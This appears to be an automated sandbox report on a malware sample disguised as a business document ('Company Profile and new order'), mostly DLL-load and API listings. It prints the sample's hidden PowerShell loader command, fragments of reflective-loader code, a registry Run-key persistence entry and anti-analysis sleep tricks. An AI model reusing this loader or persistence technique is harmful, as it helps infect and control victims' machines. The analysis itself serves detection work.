            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: edputil.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: appresolver.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: slc.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sppc.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: schannel.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winmm.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: pstorec.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: pstorec.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Company Profile and new order-202401127.scr.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: indows\System.Core.pdb | source: powershell.exe, 00000002.00000002.2616173685.0000000008C0A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: stem.Core.pdb | source: powershell.exe, 00000002.00000002.2616173685.0000000008C0A000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Yara match | File source: 00000002.00000002.2617447888.000000000A528000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Mellemtekstens $Merkantiliserings $Smutvejens239), (Timeliges @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Aftrappendes230 = [AppDomain]::CurrentDomain.
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Bldhjertede)), $Oprmning).DefineDynamicModule($Baneanlg, $false).DefineType($Bastardiserende, $Straffeprdikenernes, [System.MulticastD
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)"
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 10_2_004044A4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0518A4D0 pushfd ; ret 2_2_0518A4D9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_05180F97 pushad ; retf 0004h 2_2_05180FA2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0518E9F9 push eax; mov dword ptr [esp], edx 2_2_0518EA0C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_051812D8 push esp; retf 0004h 2_2_051812E1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07CC0FC4 push es; iretd 2_2_07CC0FC7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_09A12C90 push 8BD38B50h; iretd 2_2_09A12C96
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_22F61219 push esp; iretd 6_2_22F6121A
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_22F52806 push ecx; ret 6_2_22F52819
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0044693D push ecx; ret 10_2_0044694D
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0044DB70 push eax; ret 10_2_0044DB84
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0044DB70 push eax; ret 10_2_0044DBAC
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00451D54 push eax; ret 10_2_00451D61
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0044B090 push eax; ret 11_2_0044B0A4
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0044B090 push eax; ret 11_2_0044B0CC
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00451D34 push eax; ret 11_2_00451D41
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00444E71 push ecx; ret 11_2_00444E81
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00414060 push eax; ret 12_2_00414074
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00414060 push eax; ret 12_2_0041409C
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00414039 push ecx; ret 12_2_00414049
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_004164EB push 0000006Ah; retf 12_2_004165C4
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00416553 push 0000006Ah; retf 12_2_004165C4
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00416555 push 0000006Ah; retf 12_2_004165C4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Company Profile and new order-202401127.scr.exe
            Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Loaded

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 11_2_004047CB
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6401
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3256
            Source: C:\Windows\SysWOW64\msiexec.exe | API coverage: 8.9 %
            Source: C:\Windows\SysWOW64\msiexec.exe | API coverage: 8.3 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2824 | Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604 | Thread sleep time: -39000s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Code function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Code function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Code function: 0_2_00402910 FindFirstFileW,0_2_00402910
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_22F510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_22F510F1
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_22F56580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,6_2_22F56580
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407EF8
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407898
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00418981 memset,GetSystemInfo,10_2_00418981
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\nonopposable\ff4\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\nonopposable\
            Source: ModuleAnalysisCache.2.dr | Binary or memory string: Remove-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter@\eq
            Source: ModuleAnalysisCache.2.dr | Binary or memory string: Add-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter@\eq
            Source: powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter@\eq
            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3307439894.0000000006B44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: ModuleAnalysisCache.2.dr | Binary or memory string: Get-NetEventVmNetworkAdapter
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | API call chain: ExitProcess graph end node graph_0-3819
